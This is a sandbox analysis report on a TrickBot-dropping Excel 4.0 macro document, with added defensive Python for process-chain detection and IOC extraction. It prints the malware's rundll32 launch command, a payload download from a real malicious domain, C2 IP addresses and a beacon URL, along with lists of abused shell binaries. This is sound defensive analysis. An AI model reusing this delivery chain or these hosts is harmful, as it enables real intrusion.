
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls)
Analysis ID:355602
MD5:422030b616989ef7bf2f56a2f266068f
SHA1:04ec47e9f08ed7e4861c6f252a381faee4283bf9
SHA256:6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2340 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2548 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2424 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2316 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2344 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.270000.1.raw.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security
4.2.rundll32.exe.270000.1.unpack | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: rundll32 ..\BASE.BABAA,DllRegisterServer
  CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer
  CommandLine|base64offset|contains: ]
  Image: C:\Windows\System32\rundll32.exe
  NewProcessName: C:\Windows\System32\rundll32.exe
  OriginalFileName: C:\Windows\System32\rundll32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 2340
  ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer
  ProcessId: 2548
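The Sigma match above fires on the parent/child pair alone (an Office binary starting rundll32.exe). The chain in this report carries three further signals worth encoding: the rundll32 module is a relative path without a DLL extension (`..\BASE.BABAA`), the export invoked is DllRegisterServer, and the WOW64 rundll32 then starts wermgr.exe, which is normally a child of the WER service host. The Python below is an added example, not Joe Sandbox code and not the Sigma rule itself: it runs those checks over process-creation events written as Sysmon Event ID 1 style dicts. The PIDs and command lines are the ones in this report; the parent of EXCEL.EXE and the two benign events at the end are constructed, and the "expected parents" list for wermgr.exe is a heuristic of this example.

```python
"""Process-creation triage for the chain in this report:
EXCEL.EXE -> rundll32 ..\\BASE.BABAA,DllRegisterServer -> rundll32 (WOW64) -> wermgr.exe
Added example; not Joe Sandbox code and not the Sigma rule itself. Events are
constructed dicts with Sysmon Event ID 1 style field names."""
import re

# Parent/child sets in the spirit of the Sigma rule "Microsoft Office Product
# Spawning Windows Shell"; these lists are this example's own, not the rule's.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "outlook.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                  "certutil.exe", "bitsadmin.exe", "msiexec.exe", "schtasks.exe"}
RUNDLL_MODULE_EXTS = {".dll", ".cpl", ".ocx"}
# Heuristic (assumption): wermgr.exe is normally started by the WER service
# host or another WER binary, not by rundll32 or an Office process.
WERMGR_EXPECTED_PARENTS = {"svchost.exe", "werfault.exe", "wermgr.exe"}

# rundll32[.exe] <module>,<entry> [args]; the module may be quoted
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+("[^"]*"|[^,\s]+)\s*,\s*([^\s,]+)',
                       re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_rundll32(cmdline):
    """Return module/entry details of a rundll32 command line, or None."""
    m = RUNDLL_RE.search(cmdline)
    if not m:
        return None
    module = m.group(1).strip('"')
    name = basename(module)
    ext = "." + name.rsplit(".", 1)[1] if "." in name else ""
    return {"module": module, "entry": m.group(2), "ext": ext,
            "absolute": bool(re.match(r"^(?:[A-Za-z]:\\|\\\\)", module))}


def triage_event(ev):
    """Return the list of finding tags for one process-creation event."""
    parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
    findings = []
    if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
        findings.append("office_spawns_shell")
    if image == "rundll32.exe":
        r = parse_rundll32(ev["CommandLine"])
        if r:
            if r["ext"] not in RUNDLL_MODULE_EXTS:
                findings.append("rundll32_module_non_dll_extension")
            if not r["absolute"]:
                findings.append("rundll32_module_relative_path")
            if r["entry"].lower() == "dllregisterserver":
                findings.append("rundll32_dllregisterserver_entry")
    if image == "wermgr.exe" and parent not in WERMGR_EXPECTED_PARENTS:
        findings.append("wermgr_unexpected_parent")
    return findings


def triage(events):
    """Map ProcessId -> findings for every event that raised at least one."""
    out = {}
    for ev in events:
        f = triage_event(ev)
        if f:
            out[ev["ProcessId"]] = f
    return out


OFFICE = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
# PIDs and command lines follow the report's process tree; the parent of
# EXCEL.EXE and the last two (benign) events are constructed for contrast.
SAMPLE_EVENTS = [
    {"ProcessId": 2340, "ParentImage": r"C:\Windows\explorer.exe", "Image": OFFICE,
     "CommandLine": "'" + OFFICE + "' /automation -Embedding"},
    {"ProcessId": 2548, "ParentImage": OFFICE,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\BASE.BABAA,DllRegisterServer"},
    {"ProcessId": 2424, "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32 ..\BASE.BABAA,DllRegisterServer"},
    {"ProcessId": 2316, "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "Image": r"C:\Windows\System32\wermgr.exe",
     "CommandLine": r"C:\Windows\system32\wermgr.exe"},
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\wermgr.exe",
     "CommandLine": r"C:\Windows\system32\wermgr.exe -upload"},
    {"ProcessId": 4200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for pid, tags in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The second rundll32 (PID 2424) has no Office parent, so the Sigma pairing alone would not see it; the module and entry checks still tag it, and the wermgr.exe rule catches the final hop that loads the TrickBot payload into a signed system binary.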

                Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | ReversingLabs: Detection: 25%
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0 CryptAcquireContextW,

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092317965.000000006E8A9000.00000002.00020000.sdmp, BASE.BABAA.0.dr
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290 FindFirstFileW,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 8[1].jjkes.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 60MB
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec eax (9 occurrences)
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx edx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc dword ptr [esp+40h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc esp (2 occurrences)
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ecx, word ptr [eax+02h]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx eax, byte ptr [ebx]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then inc edx
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then movzx ebx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe | Code function: 4x nop then mov ebx, edx
Source: global traffic | DNS query: name: www.chipmania.it
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 200.52.147.93:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49166 -> 200.52.147.93:443
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49167 -> 142.202.191.164:443
Source: Traffic | Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49169 -> 193.8.194.96:443
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49169
Source: Joe Sandbox View | IP Address: 185.81.0.78
Source: Joe Sandbox View | IP Address: 200.52.147.93
Source: Joe Sandbox View | ASN Name: RedesyTelecomunicacionesHN
Source: global traffic | HTTP traffic detected (reported twice): GET /mails/open.php HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.chipmania.it | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 200.52.147.93 (5 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.chipmania.it
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2362129186.00000000341A0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2356106081.000000000029A000.00000004.00000020.sdmp | String found in binary or memory: https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/
Source: wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp | String found in binary or memory: https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/=
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown | Network traffic detected: HTTP traffic on port 49166 -> 443
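The Networking entries above mix three kinds of indicator: Snort alerts against Feodo Tracker and abuse.ch SSL blacklist rules (where the alert on the certificate fires on the server-to-client leg, so the remote host is the source address), the plain-HTTP download of the loader from www.chipmania.it, and a TrickBot beacon URL recovered from wermgr.exe memory. The Python below is an added example, not Joe Sandbox code: it turns constructed lines in the report's own format into a deduplicated IOC set and decodes the beacon path. The `/<gtag>/<client id>/<command>/` layout and the client-id split into computer name, `W` plus Windows major.minor.build and a 32-hex-character GUID follow the commonly documented TrickBot URI scheme and are an assumption of this example, not something the report states; `W617601` decoding to 6.1 build 7601 is consistent with the w7x64 analysis system.

```python
"""Network-indicator triage for this report's Networking section. Added
example, not Joe Sandbox code. SAMPLE_LINES are constructed from the alert,
HTTP and memory-string entries above. The TrickBot beacon layout
(/<gtag>/<client id>/<command>/...) and the client-id decode are the commonly
documented scheme and an assumption here, not something the report states."""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

SNORT_RE = re.compile(r"Snort IDS:\s*(\d+)\s+(.*?)\s+(\S+):(\d+)\s*->\s*(\S+):(\d+)")
HTTP_RE = re.compile(r"GET (\S+) HTTP/1\.\d.*?Host:\s*(\S+)")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
BEACON_RE = re.compile(r"^/(?P<gtag>[^/]+)/(?P<client>[^/]+)/(?P<cmd>\d+)/")
CLIENT_RE = re.compile(r"^(?P<host>.+?)_W(?P<major>\d)(?P<minor>\d)(?P<build>\d+)"
                       r"\.(?P<guid>[0-9A-Fa-f]{32})$")


def _is_ip(s):
    try:
        ip_address(s)
        return True
    except ValueError:
        return False


def parse_snort_alert(line):
    """Split a Snort line into sid, message and the non-private endpoint."""
    m = SNORT_RE.search(line)
    if not m:
        return None
    sid, msg, src, sport, dst, dport = m.groups()
    inbound = not ip_address(src).is_private    # alert fired on server->client
    remote, port = (src, sport) if inbound else (dst, dport)
    return {"sid": int(sid), "msg": msg, "remote": remote,
            "port": int(port), "inbound": inbound}


def decode_beacon_url(url):
    """Decode a TrickBot-style beacon URL; None if the path does not fit."""
    u = urlsplit(url)
    m = BEACON_RE.match(u.path)
    if not m:
        return None
    out = {"c2": u.hostname, "gtag": m["gtag"], "command": int(m["cmd"]),
           "client_id": m["client"]}
    c = CLIENT_RE.match(m["client"])
    if c:   # <computer name>_W<major><minor><build>.<32 hex chars> (assumed layout)
        out.update(victim_host=c["host"],
                   os_version="%s.%s build %s" % (c["major"], c["minor"], c["build"]),
                   guid=c["guid"].upper())
    return out


def collect_iocs(lines):
    """Aggregate remote IPs, domains, URLs, SIDs and decoded beacons."""
    iocs = {"ips": set(), "domains": set(), "urls": set(), "sids": set(),
            "beacons": []}
    for line in lines:
        a = parse_snort_alert(line)
        if a:
            iocs["ips"].add(a["remote"])
            iocs["sids"].add(a["sid"])
            continue
        # trailing '=' on the memory string is residue; the same URL appears
        # in the report without it
        urls = [m.group(0).rstrip("=") for m in URL_RE.finditer(line)]
        h = HTTP_RE.search(line)
        if h:                      # rebuild the URL from request line + Host
            urls.append("http://%s%s" % (h.group(2), h.group(1)))
        for url in urls:
            iocs["urls"].add(url)
            host = urlsplit(url).hostname
            (iocs["ips"] if _is_ip(host) else iocs["domains"]).add(host)
            b = decode_beacon_url(url)
            if b:
                iocs["beacons"].append(b)
    return iocs


# Constructed from the report's entries; the HTTP line is shortened to the
# request line and Host header.
SAMPLE_LINES = [
    "Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49166 -> 200.52.147.93:443",
    "Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49167 -> 142.202.191.164:443",
    "Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49169 -> 193.8.194.96:443",
    "Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49169",
    "HTTP traffic detected: GET /mails/open.php HTTP/1.1 Host: www.chipmania.it",
    "String found in binary or memory: https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/=",
]

if __name__ == "__main__":
    result = collect_iocs(SAMPLE_LINES)
    for key in ("ips", "domains", "urls", "sids"):
        print(key, sorted(result[key], key=str))
    print("beacons", result["beacons"])
```

Note that 142.202.191.164 and 193.8.194.96 never appear in the TCP-traffic or DNS entries, only in the alerts; collecting from both sources is what gives the full C2 list for blocking.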

System Summary:

Found malicious Excel 4.0 Macro
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above I . . . . . E' 15 16 Once you have enabled editing
Source: Screenshot number: 4 | Screenshot OCR: Enable content button 'Yuts S," " from the yellow bar above :: "";"" " 6~_ 22 23 24 25 26 2
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 | Screenshot OCR: Enable content button from the yellow bar above j'
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B470 NtDelayExecution,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,CloseHandle,HeapFree,
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00078CA0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E0F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00068010
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077840
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00080870
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000644C0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000790E0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000714F0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061500
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076100
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076D10
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00072580
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00069200
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CA00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077630
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CE70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006A280
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006C290
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006CEB0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B700
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E310
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00062720
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00075F70
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000763A8
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000717B0
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00120040
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: Joe Sandbox View | Dropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@9/7@3/2
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\3ECE0000
Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{3911DBC3-3842-26B4-C41F-452645FC2FA1}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC11C.tmp
Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\wermgr.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
